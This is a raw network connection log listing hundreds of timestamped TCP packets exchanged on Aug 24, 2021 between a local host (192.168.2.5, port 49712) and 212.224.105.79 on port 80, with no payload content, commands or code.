Aug 24, 2021 08:49:17.293068886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293087006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293095112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293102980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293116093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293119907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293135881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293145895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293152094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293168068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293179989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293184996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293205023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293206930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293222904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293239117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293251038 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293256044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293272018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293277979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293288946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293306112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293312073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293323040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293343067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293359995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293360949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293378115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293392897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293394089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293411016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293425083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293426991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293442965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293458939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293461084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293479919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293489933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293497086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293513060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293529034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293530941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293546915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293556929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293561935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293579102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293592930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293596029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293615103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293620110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293633938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293651104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293663025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293668032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293684006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293689966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293699980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293715954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293724060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293731928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293752909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293770075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293776989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293786049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293811083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293832064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294218063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294238091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294255972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294272900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294287920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294290066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294307947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294315100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294327974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294342041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294347048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294363976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294380903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294387102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294397116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294414997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294425011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294431925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294450045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294466019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294475079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294492960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294507027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294508934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294526100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294542074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294553995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294558048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294575930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294584036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294591904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294604063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294610977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294629097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294636011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294645071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294661999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294672966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294677973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294693947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294699907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294709921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294725895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294743061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294744968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294761896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294770002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294778109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294795990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294802904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294811964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294826984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294843912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294847012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294859886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294878960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294882059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294895887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294913054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294929028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294934988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294945955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294961929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294975042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.294977903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.294995070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295000076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295013905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295031071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295038939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295047045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295063972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295079947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295088053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295095921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295128107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295136929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295149088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295156002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295164108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295183897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295202017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295203924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295217991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295236111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295239925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295253992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295267105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295274973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295284033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295300961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295315981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295320034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295336962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295342922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295353889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295366049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295372009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295388937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295409918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295413971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295428991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295439005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295445919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295471907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295475960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295485020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295501947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295520067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295521021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295536041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295545101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295556068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.295584917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.295850039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.318629026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318646908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318664074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318677902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.318685055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318702936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318753004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.318813086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318829060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318914890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.318921089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.318934917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318953037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318969965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318989992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.318996906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319006920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319024086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319035053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319040060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319056034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319072008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319072008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319088936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319094896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319106102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319137096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319143057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319163084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319180965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319197893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319214106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319231033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319237947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319241047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319247961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319264889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319272995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319279909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319295883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319299936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319318056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319324017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319333076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319350004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319364071 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319369078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319386005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319389105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319401979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319427013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319555998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319574118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319587946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319607019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319618940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.319622040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319654942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.319684982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320143938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320163012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320180893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320197105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320204020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320211887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320228100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320240974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320242882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320260048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320264101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320276976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320297003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320302963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320313931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320329905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320342064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320346117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320363045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320367098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320378065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320394993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320403099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320410967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320430994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320435047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320447922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320465088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320472002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320482016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320493937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320512056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320513964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320530891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320538044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320548058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320560932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320573092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320581913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320591927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320604086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320616961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320630074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320636988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320651054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320657015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320667982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320684910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320693970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320700884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320717096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320729017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320734024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320749998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320763111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320765972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320785999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320791960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320802927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320820093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320827007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320836067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320853949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320861101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320868969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320885897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320894003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320900917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320920944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320929050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320939064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320955992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320965052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.320971966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320988894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.320997953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321002007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321018934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321022034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321037054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321054935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321060896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321070910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321086884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321104050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321110010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321120977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321141005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321151018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321161985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321171045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.321173906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.321187973 CEST	80	49712	212.224.105.79	192.168.2.5
